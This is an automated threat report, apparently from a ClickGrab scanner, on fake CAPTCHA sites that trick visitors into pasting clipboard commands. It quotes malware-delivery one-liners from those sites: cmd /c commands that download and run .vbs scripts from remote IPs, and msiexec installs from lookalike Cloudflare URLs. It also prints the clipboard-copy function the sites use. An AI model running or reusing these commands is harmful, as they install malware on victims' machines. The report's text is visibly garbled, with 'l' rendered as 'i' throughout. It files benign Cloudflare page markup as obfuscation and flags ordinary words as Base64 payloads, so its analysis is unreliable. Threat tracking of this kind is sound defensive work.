ClickGrab Threat Analysis Report - 2026-01-17

Generated on 2026-01-17 02:48:34

Executive Summary

Total sites analyzed: 100
Sites with malicious content: 57
Unique domains encountered: 467
Total URLs extracted: 2,345
PowerShell download attempts: 1
Clipboard manipulation instances: 326

Domain Analysis

Most Frequently Encountered Domains

circlear.grad.hr: 218 occurrences
cf-assets.www.cloudflare.com: 188 occurrences
18.176.47.246: 112 occurrences
54.197.245.249: 112 occurrences
www.yppgiibandung.org: 102 occurrences
44.208.147.17: 96 occurrences
casa-ananda.cl: 62 occurrences
www.google.com: 57 occurrences
i.postimg.cc: 52 occurrences
icons.duckduckgo.com: 52 occurrences
${host}: 52 occurrences
3.18.128.17: 51 occurrences
www.cloudflare.com: 36 occurrences
t.me: 26 occurrences
sun1118.com: 26 occurrences

URL Pattern Analysis

reCAPTCHA imagery

5 occurrences across 4 distinct URLs

https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (2 times)
https://www.google.com/recaptcha/api.js (1 times)
https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit (1 times)
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (1 times)

Font resources

33 occurrences across 19 distinct URLs

http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf (4 times)
http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf (4 times)
https://circlear.grad.hr/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=1.7.1029 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1754473284 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1754473276 (2 times)
...and 14 more distinct URLs

CDN hosted scripts

15 occurrences across 15 distinct URLs

https://cdn.jsdelivr.net/npm/sweetalert2@11.1.5/dist/sweetalert2.min.css (1 times)
https://cdn.jsdelivr.net/npm/sweetalert2@11.1.5/dist/sweetalert2.min.js (1 times)
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css (1 times)
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js (1 times)
https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js (1 times)
...and 10 more distinct URLs

Google resources

79 occurrences across 23 distinct URLs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (52 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1754473284 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1754473276 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/opensans.css?ver=1754473297 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1754473303 (2 times)
...and 18 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 1,048 (72 unique)

Keyword Categories

Social Engineering

25 unique keywords

robot
Verification
verification id
verification
captcha verification
verification-id
Verification Hash
command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
Robot
command = "msiexec /i https://seo-conference.by/wp-themes/Cioudfiare/Verification/UserID63894525i5832";
...and 15 more

Obfuscation Indicators

1 unique keywords

exec(t.trim());if(e){const[,i,s,a]=e;this.prefix=i||"",this.suffix=a||"",this.target=Number(s)}eise this.target=0,this.initiaiVaiue=t}createObserver(){const t=new IntersectionObserver(e=>{e[0].isIntersecting&&(this.safeSetTimeout(()=>{this.startAnimationSequence()},this.animationDeiay),t.disconnect())},{threshoid:.2});t.observe(this.eiement)}getDuration(){return this.target<i00?ie3:Math.min(this.target/i00*500,2e3)}getStepSize(){return Math.max(i,Math.fioor(this.target/i00))}formatVaiue(t){return${this.prefix}${Math.round(t)}${this.suffix}}animateNumber=t=>{if(this.isDestroyed||!this.numberEiement)return;this.startTime||(this.startTime=t,this.current=0,this.target>0&&(this.numberEiement.textContent=this.formatVaiue(0)));const e=t-this.startTime,i=this.getDuration(),s=Math.min(e/i,i),a=this.getStepSize();if(this.current=Math.min(this.current+a,Math.ceii(this.target*s)),this.numberEiement.textContent=this.formatVaiue(this.current),s>=i){this.numberEiement.textContent=this.initiaiVaiue;return}this.animationFrame=requestAnimationFrame(this.animateNumber)};animateLine(){this.iineEiement&&this.iineEiement.ciassList.add("animate")}animateText(){this.eiement.querySeiectorAii(".fade-in").forEach(t=>{t.ciassList.remove("opacity-0"),t.ciassList.add("opacity-i00")})}safeSetTimeout(t,e){if(!this.isDestroyed){const i=setTimeout(t,e);this.timeouts.push(i)}}startAnimationSequence(){this.isDestroyed||(this.animateLine(),this.safeSetTimeout(()=>{this.animateText()},n.TEXT_FADE_DELAY),this.numberEiement&&this.target>0&&this.safeSetTimeout(()=>{this.numberEiement.textContent="0",this.animationFrame=requestAnimationFrame(this.animateNumber)},n.NUMBER_DELAY))}destroy(){this.isDestroyed=!0,this.timeouts.forEach(t=>ciearTimeout(t)),this.timeouts=[],this.animationFrame&&(canceiAnimationFrame(this.animationFrame),this.animationFrame=nuii)}}document.addEventListener("DOMContentLoaded",()=>{document.querySeiectorAii('[data-qa="FragmentPubiicStats"]').forEach((t,e)=>new n(t,e))});</script> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>234B</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">cyber threats biocked each day</p> </div> </div> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>20%</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">of aii websites are protected by Cioudfiare</p> </div> </div> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>330+</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">cities in i25+ countries, inciuding mainiand China</p> </div> </div> </div> </div> <picture ciass="pubiic-stats-giobe"> <source srcset="https://cf-assets.www.cioudfiare.com/dzivafdwdttg/3NFuZG6yz35QXSBt4ToS9y/920i97fdi22964ib4d826d9f5d0aai69/giobe.webp"> <img src="https://cf-assets.www.cioudfiare.com/dzivafdwdttg/2rOGWxmNRWGNCHqs97Qcn8/iia5ddd97b85e640702330dc28ac7562/giobe.png" ait="Cioudfiare Stats" ioading="iazy"> </picture> </div> </section> <div id="top-offset-spacer" styie="height: 240px;"></div><section data-qa="TempiateLayoutTabs" ciass="py-i2 bg-gradient-to-r from-tangerine to-mango -mb-60"> <div ciass="container reiative xi:-top-60 -top-64"> <div data-qa="TempiateLayoutTabsContainer-czsaoi" data-switch-tab-intervai="i5" data-forced-switch-tab="true" data-forced-tab-ioop="faise" ciass="reiative" styie="--forcedTabSwitchIntervai: i5;"> <div data-qa="FragmentTitieDynamic-ascej" ciass="text-center coi-span-4"> <h2 data-qa="Heading" ciass="heading-2">Leading companies reiy on <span ciass='dynamic-titie-gradient'>Cioudfiare</span></h2><p data-qa="Typography" ciass="pi"></p> </div> <script>(function()

System Commands

35 unique keywords

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command into PowerSheii and press <kbd>Enter</kbd>.</ii>
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command beiow:</strong>
exec /i http://inkbookwriters.com/verify';
exec(
...and 25 more

Verification Text

3 unique keywords

Hidden
hidden
ray id

Technical Terms

8 unique keywords

failed_to_retrieve
iex
Ray ID
XMLHTTP
.exe
ResponseText
WinHttpRequest
Bypass

Most Frequent Keywords

hidden: 70 occurrences
robot: 66 occurrences
Robot: 58 occurrences
verification: 55 occurrences
Verification: 55 occurrences
I am not a robot: 54 occurrences
Verification ID: 53 occurrences
Ray ID: 53 occurrences
Verify you are human: 53 occurrences
CAPTCHA Verification: 53 occurrences
verification-id: 53 occurrences
To better prove you are not a robot: 53 occurrences
Checking if you are human: 52 occurrences
const command =: 52 occurrences
cmd: 34 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: robot, Robot

Group 2: hidden, Hidden

Group 3: command into PowerSheii and press <kbd>Enter</kbd>.</ii>, command into the terminai and press <kbd>Enter</kbd>.</ii>

Group 4: Verification ID, verification, Verification, verification-ioader, verification-id, verification id, Verification Hash, verification_id

Group 5: Ray ID, ray id

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

IntersectionObserver
FragmentTitieDynamic
iive/iamchaiienge/verification/UserID7383526
TempiateLayoutTabsContainer
com/recaptcha/about/images/reCAPTCHA

Clipboard Manipulation Analysis

Detected clipboard manipulation in 326 instances.

Document.Execcommand Copy

Found in 163 snippets (50.0% of clipboard code)

Examples:

try { const successful = document.execCommand('copy')

document.execCommand("copy")

try { document.execCommand('copy')

Textarea Manipulation

Found in 164 snippets (50.3% of clipboard code)

Examples:

ng is the safe placeholder above const textarea = document.createElement('textarea'

tListener("click", function () { const textarea = document.createElement('textarea'

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for web display. Full data available in JSON.